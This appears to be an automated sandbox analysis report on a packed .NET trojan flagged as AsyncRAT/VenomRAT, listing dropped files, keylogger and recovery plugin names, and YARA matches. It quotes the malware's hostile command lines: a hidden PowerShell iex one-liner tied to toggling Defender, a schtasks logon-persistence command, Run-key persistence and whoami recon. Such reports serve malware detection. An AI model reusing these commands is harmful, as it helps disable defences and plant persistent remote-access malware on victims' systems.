Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %costura.messagepacklib.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.costura.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Keylogger.pdb source: Loader.exe, 00000014.00000002.2813392889.000000001CC40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: tion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb`- source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3812.tmp.dmp.30.dr
Source:	Binary string: WinDefend.pdb source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000000.2004261528.0000000000BEC000.00000002.00000001.01000000.00000008.sdmp, WinDefend.exe.0.dr
Source:	Binary string: lib.pdbX source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: SendMemory.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb^ source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Keylogger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000002F.00000002.3065403253.0000029A21DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Recovery.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Dynamic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: MessagePackLib.pdbzZ) source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: SendMemory.pdb g source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Logger.pdb source: Loader.exe, 00000014.00000002.2746255140.000000001B4A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mscorlib.pdb Operatin source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbP source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Extra.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3812.tmp.dmp.30.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: Loader.exe, 00000014.00000002.2812581762.000000001CA40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Extra.pdb` source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: lib.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendMemory.pdb source: Loader.exe, 00000014.00000002.2744256904.000000001B430000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: Loaader.exe, 00000015.00000002.3394522285.0000000013094000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3269125954.00000000014A0000.00000004.08000000.00040000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Configuration.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\Ninja\Downloads\dcrat_fix-master\dcrat_fix-master\MessagePack\bin\Release\MessagePackLib.pdb source: Loaader.exe, 00000015.00000002.3552953263.000000001CB50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb@ source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.polly.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: MessagePackLib.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: ion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n.pdb; source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Extra.pdb source: Loader.exe, 00000014.00000002.2744918575.000000001B440000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Client.exe.0.dr, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])

Binary or sample is protected by dotNetProtector

Source: Loaader.exe, 00000015.00000002.3279406643.0000000002F00000.00000004.08000000.00040000.00000000.sdmp

String found in binary or memory: dotNetProtector

Suspicious powershell command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}

Yara detected Costura Assembly Loader

Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Binary contains a suspicious time stamp

Source: WinDefend.exe.0.dr

Static PE information: 0xCB2C3ED5 [Thu Jan 6 06:01:57 2078 UTC]

PE file contains sections with non-standard names

Source: WinDefend.exe.0.dr	Static PE information: section name: %q2hF6
Source: WinDefend.exe.0.dr	Static PE information: section name:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Code function: 0_2_00007FF848F200BD pushad ; iretd	0_2_00007FF848F200C1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F000BD pushad ; iretd	2_2_00007FF848F000C1
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F100BD pushad ; iretd	3_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF53CF push edx; iretd	4_2_02CF53D2
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF53AF push ecx; iretd	4_2_02CF53B6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF53AB push ecx; iretd	4_2_02CF53AE
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF16DF push cs; iretd	4_2_02CF16E6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF16B3 push cs; iretd	4_2_02CF16BA
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF1641 push ss; iretd	4_2_02CF1642
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF545B push ebx; iretd	4_2_02CF5462
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF546B push edx; iretd	4_2_02CF546E
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF541F push eax; iretd	4_2_02CF5426
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF25BF push ds; iretd	4_2_02CF25C6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF2577 push ds; iretd	4_2_02CF2586
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F400BD pushad ; iretd	18_2_00007FF848F400C1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F100BD pushad ; iretd	19_2_00007FF848F100C1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F4792B push ebx; retf	20_2_00007FF848F4796A
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F4614A pushfd ; ret	20_2_00007FF848F46191
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F48167 push ebx; ret	20_2_00007FF848F4816A
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F46192 push edi; ret	20_2_00007FF848F461D6
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F43C10 push esi; retf 5F4Ah	20_2_00007FF848F55AD7
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F47C5E push eax; retf	20_2_00007FF848F47C6D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F47BCE pushad ; retf	20_2_00007FF848F47C5D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F300BD pushad ; iretd	20_2_00007FF848F300C1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF849121A34 push ss; iretd	20_2_00007FF849121A38
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0EEF5 pushad ; retf	21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F15587 push ecx; iretd	21_2_00007FF848F155DC
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0F020 pushad ; retf	21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F000BD pushad ; iretd	21_2_00007FF848F000C1
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0EF70 pushad ; retf	21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0EF98 pushad ; retf	21_2_00007FF848F0F149

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Static PE information: section name: .text entropy: 7.992585946584666
Source: WinDefend.exe.0.dr	Static PE information: section name: %q2hF6 entropy: 7.9947379715100375

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\Client.exe	File created: C:\Users\user\AppData\Roaming\Loader.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	File created: C:\Users\user\AppData\Local\Temp\Infected.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	File created: C:\Users\user\AppData\Roaming\Loaader.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	File created: C:\Users\user\AppData\Local\Temp\Client.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	File created: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: unknown	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YourAppName			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YourAppName			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender

Stores large binary data to the registry

Source: C:\Users\user\AppData\Roaming\Loader.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1 D179E1D3E1F46C85BB4A03E9C9069E8B529999E776B7B12C2D4A47F622535F8C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
